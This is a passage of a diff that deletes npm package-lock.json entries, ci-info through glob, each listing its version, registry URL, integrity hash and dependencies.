"sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==" - }, - "ci-info": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.2.0.tgz", - "integrity": "sha512-dVqRX7fLUm8J6FgHJ418XuIgDLZDkYcDFTeL6TA2gt5WlIZUQrrH6EZrNClwT/H0FateUsZkGIOPRrLbP+PR9A==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s=", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" - }, - "cosmiconfig": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-7.1.0.tgz", - "integrity": "sha512-AdmX6xUzdNASswsFtmwSt7Vj8po9IuqXm0UXz7QKPuEUmPB4XyjGfaAr2PSuELMwkRMVH1EpIkX5bTZGRB3eCA==", - "dev": true, - "requires": { - "@types/parse-json": "^4.0.0", - "import-fresh": "^3.2.1", - "parse-json": "^5.0.0", - "path-type": "^4.0.0", - "yaml": "^1.10.0" - } - }, - "create-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", - "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "prompts": "^2.0.1" - } - }, - "cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "debug": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.2.tgz", - "integrity": "sha512-mOp8wKcvj7XxC78zLgw/ZA+6TSgkoE2C/ienthhRD298T7UNwAg9diBpLRxC0mOezLl4B0xV7M0cCO6P/O0Xhw==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", - "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", - "dev": true, - "requires": {} - }, - "deep-is": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.3.tgz", - "integrity": "sha1-s2nW+128E+7PUk+RsHD+7cNXzzQ=", - "dev": true, - "peer": true - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", - "dev": true - }, - "doctrine": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/doctrine/-/doctrine-3.0.0.tgz", - "integrity": "sha512-yS+Q5i3hBf7GBkd4KG8a7eBNNWNGLTaEwwYWUijIYM7zrlYDM0BFXHjjPWlWZ1Rg7UaddZeIDmi9jF3HmqiQ2w==", - "dev": true, - "peer": true, - "requires": { - "esutils": "^2.0.2" - } - }, - "dot-prop": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/dot-prop/-/dot-prop-6.0.1.tgz", - "integrity": "sha512-tE7ztYzXHIeyvc7N+hR3oi7FIbf/NIjVP9hmAt3yMXzrQ072/fpjGLx2GxNxGxUl5V73MEqYzioOMoVhGMJ5cA==", - "dev": true, - "requires": { - "is-obj": "^2.0.0" - } - }, - "eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", - "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "ejs": { - "version": "3.1.10", - "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", - "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", - "dev": true, - "requires": { - "jake": "^10.8.5" - } - }, - "electron-to-chromium": { - "version": "1.4.737", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.737.tgz", - "integrity": "sha512-QvLTxaLHKdy5YxvixAw/FfHq2eWLUL9KvsPjp0aHK1gI5d3EDuDgITkvj0nFO2c6zUY3ZqVAJQiBYyQP9tQpfw==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "enquirer": { - "version": "2.3.6", - "resolved": "https://registry.npmjs.org/enquirer/-/enquirer-2.3.6.tgz", - "integrity": "sha512-yjNnPr315/FjS4zIsUxYguYUPP2e1NK4d7E7ZOLiyYCcbFBiTMyID+2wvm2w6+pZ/odMA7cRkjhsPbltwBOrLg==", - "dev": true, - "peer": true, - "requires": { - "ansi-colors": "^4.1.1" - } - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.2.tgz", - "integrity": "sha512-ErCHMCae19vR8vQGe50xIsVomy19rg6gFu3+r3jkEO46suLMWBksvVyoGgQV+jOfl84ZSOSlmv6Gxa89PmTGmA==", - "dev": true - }, - "escape-string-regexp": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", - "integrity": "sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==", - "dev": true, - "peer": true - }, - "eslint": { - "version": "7.32.0", - "resolved": "https://registry.npmjs.org/eslint/-/eslint-7.32.0.tgz", - "integrity": "sha512-VHZ8gX+EDfz+97jGcgyGCyRia/dPOd6Xh9yPv8Bl1+SoaIwD+a/vlrOmGRUyOYu7MwUhc7CxqeaDZU13S4+EpA==", - "dev": true, - "peer": true, - "requires": { - "@babel/code-frame": "7.12.11", - "@eslint/eslintrc": "^0.4.3", - "@humanwhocodes/config-array": "^0.5.0", - "ajv": "^6.10.0", - "chalk": "^4.0.0", - "cross-spawn": "^7.0.2", - "debug": "^4.0.1", - "doctrine": "^3.0.0", - "enquirer": "^2.3.5", - "escape-string-regexp": "^4.0.0", - "eslint-scope": "^5.1.1", - "eslint-utils": "^2.1.0", - "eslint-visitor-keys": "^2.0.0", - "espree": "^7.3.1", - "esquery": "^1.4.0", - "esutils": "^2.0.2", - "fast-deep-equal": "^3.1.3", - "file-entry-cache": "^6.0.1", - "functional-red-black-tree": "^1.0.1", - "glob-parent": "^5.1.2", - "globals": "^13.6.0", - "ignore": "^4.0.6", - "import-fresh": "^3.0.0", - "imurmurhash": "^0.1.4", - "is-glob": "^4.0.0", - "js-yaml": "^3.13.1", - "json-stable-stringify-without-jsonify": "^1.0.1", - "levn": "^0.4.1", - "lodash.merge": "^4.6.2", - "minimatch": "^3.0.4", - "natural-compare": "^1.4.0", - "optionator": "^0.9.1", - "progress": "^2.0.0", - "regexpp": "^3.1.0", - "semver": "^7.2.1", - "strip-ansi": "^6.0.0", - "strip-json-comments": "^3.1.0", - "table": "^6.0.9", - "text-table": "^0.2.0", - "v8-compile-cache": "^2.0.3" - } - }, - "eslint-scope": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-5.1.1.tgz", - "integrity": "sha512-2NxwbF/hZ0KpepYN0cNbo+FN6XoK7GaHlQhgx/hIZl6Va0bF45RQOOwhLIy8lQDbuCiadSLCBnH2CFYquit5bw==", - "dev": true, - "peer": true, - "requires": { - "esrecurse": "^4.3.0", - "estraverse": "^4.1.1" - } - }, - "eslint-utils": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/eslint-utils/-/eslint-utils-2.1.0.tgz", - "integrity": "sha512-w94dQYoauyvlDc43XnGB8lU3Zt713vNChgt4EWwhXAP2XkBvndfxF0AgIqKOOasjPIPzj9JqgwkwbCYD0/V3Zg==", - "dev": true, - "peer": true, - "requires": { - "eslint-visitor-keys": "^1.1.0" - }, - "dependencies": { - "eslint-visitor-keys": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-1.3.0.tgz", - "integrity": "sha512-6J72N8UNa462wa/KFODt/PJ3IU60SDpC3QXC1Hjc1BXXpfL2C9R5+AU7jhe0F6GREqVMh4Juu+NY7xn+6dipUQ==", - "dev": true, - "peer": true - } - } - }, - "eslint-visitor-keys": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-2.1.0.tgz", - "integrity": "sha512-0rSmRBzXgDzIsD6mGdJgevzgezI534Cer5L/vyMX0kHzT/jiB43jRhd9YUlMGYLQy2zprNmoT8qasCGtY+QaKw==", - "dev": true, - "peer": true - }, - "espree": { - "version": "7.3.1", - "resolved": "https://registry.npmjs.org/espree/-/espree-7.3.1.tgz", - "integrity": "sha512-v3JCNCE64umkFpmkFGqzVKsOT0tN1Zr+ueqLZfpV1Ob8e+CEgPWa+OxCoGH3tnhimMKIaBm4m/vaRpJ/krRz2g==", - "dev": true, - "peer": true, - "requires": { - "acorn": "^7.4.0", - "acorn-jsx": "^5.3.1", - "eslint-visitor-keys": "^1.3.0" - }, - "dependencies": { - "eslint-visitor-keys": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-1.3.0.tgz", - "integrity": "sha512-6J72N8UNa462wa/KFODt/PJ3IU60SDpC3QXC1Hjc1BXXpfL2C9R5+AU7jhe0F6GREqVMh4Juu+NY7xn+6dipUQ==", - "dev": true, - "peer": true - } - } - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "esquery": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/esquery/-/esquery-1.4.0.tgz", - "integrity": "sha512-cCDispWt5vHHtwMY2YrAQ4ibFkAL8RbH5YGBnZBc90MolvvfkkQcJro/aZiAQUlQ3qgrYS6D6v8Gc5G5CQsc9w==", - "dev": true, - "peer": true, - "requires": { - "estraverse": "^5.1.0" - }, - "dependencies": { - "estraverse": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.2.0.tgz", - "integrity": "sha512-BxbNGGNm0RyRYvUdHpIwv9IWzeM9XClbOxwoATuFdOE7ZE6wHL+HQ5T8hoPM+zHvmKzzsEqhgy0GrQ5X13afiQ==", - "dev": true, - "peer": true - } - } - }, - "esrecurse": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/esrecurse/-/esrecurse-4.3.0.tgz", - "integrity": "sha512-KmfKL3b6G+RXvP8N1vr3Tq1kL/oCFgn2NYXEtqP8/L3pKapUA4G8cFVaoF3SU323CD4XypR/ffioHmkti6/Tag==", - "dev": true, - "peer": true, - "requires": { - "estraverse": "^5.2.0" - }, - "dependencies": { - "estraverse": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.2.0.tgz", - "integrity": "sha512-BxbNGGNm0RyRYvUdHpIwv9IWzeM9XClbOxwoATuFdOE7ZE6wHL+HQ5T8hoPM+zHvmKzzsEqhgy0GrQ5X13afiQ==", - "dev": true, - "peer": true - } - } - }, - "estraverse": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-4.3.0.tgz", - "integrity": "sha512-39nnKffWz8xN1BU/2c79n9nB9HDzo0niYUqx6xyqUnyoAnQyyWpOTdZEeiCch8BBu515t4wp9ZmgVfVhn9EBpw==", - "dev": true, - "peer": true - }, - "esutils": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz", - "integrity": "sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==", - "dev": true, - "peer": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" - }, - "fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "fast-levenshtein": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/fast-levenshtein/-/fast-levenshtein-2.0.6.tgz", - "integrity": "sha1-PYpcZog6FqMMqGQ+hR8Zuqd5eRc=", - "dev": true, - "peer": true - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "file-entry-cache": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/file-entry-cache/-/file-entry-cache-6.0.1.tgz", - "integrity": "sha512-7Gps/XWymbLk2QLYK4NzpMOrYjMhdIxXuIvy2QBsLE6ljuodKvdkWs/cpyJJ3CVIVpH0Oi1Hvg1ovbMzLdFBBg==", - "dev": true, - "peer": true, - "requires": { - "flat-cache": "^3.0.4" - } - }, - "filelist": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", - "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", - "dev": true, - "requires": { - "minimatch": "^5.0.1" - }, - "dependencies": { - "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0" - } - }, - "minimatch": { - "version": "5.1.6", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", - "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", - "dev": true, - "requires": { - "brace-expansion": "^2.0.1" - } - } - } - }, - "fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "flat-cache": { - "version": "3.0.4", - "resolved": "https://registry.npmjs.org/flat-cache/-/flat-cache-3.0.4.tgz", - "integrity": "sha512-dm9s5Pw7Jc0GvMYbshN6zchCA9RgQlzzEZX3vylR9IqFfS8XciblUXOKfW6SiuJ0e13eDYZoZV5wdrev7P3Nwg==", - "dev": true, - "peer": true, - "requires": { - "flatted": "^3.1.0", - "rimraf": "^3.0.2" - } - }, - "flatted": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.2.2.tgz", - "integrity": "sha512-JaTY/wtrcSyvXJl4IMFHPKyFur1sE9AUqc0QnhOaJ0CxHtAoIV8pYDzeEfAaNEtGkOfq4gr3LBFmdXW5mOQFnA==", - "dev": true, - "peer": true - }, - "foreground-child": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.1.1.tgz", - "integrity": "sha512-TMKDUnIte6bfb5nWv7V/caI169OHgvwjb7V4WkeUvbQQdjr5rWKqHFiKWb/fcOwB+CzBT+qbWjvj+DVwRskpIg==", - "requires": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - }, - "dependencies": { - "signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==" - } - } - }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8=", - "dev": true - }, - "fsevents": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", - "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true - }, - "functional-red-black-tree": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/functional-red-black-tree/-/functional-red-black-tree-1.0.1.tgz", - "integrity": "sha1-GwqzvVU7Kg1jmdKcDj6gslIHgyc=", - "dev": true, - "peer": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "glob": { - "version": "7.1.7", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.1.7.tgz", - "integrity": "sha512-OvD9ENzPLbegENnYP5UUfJIirTg4+XwMWGaQfQTY0JenxNvvIKP3U3/tAQSPIu/lHxXYSZmpXlUHeqAIdKzBLQ==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.0.4", - "once": "^1.3.0", - 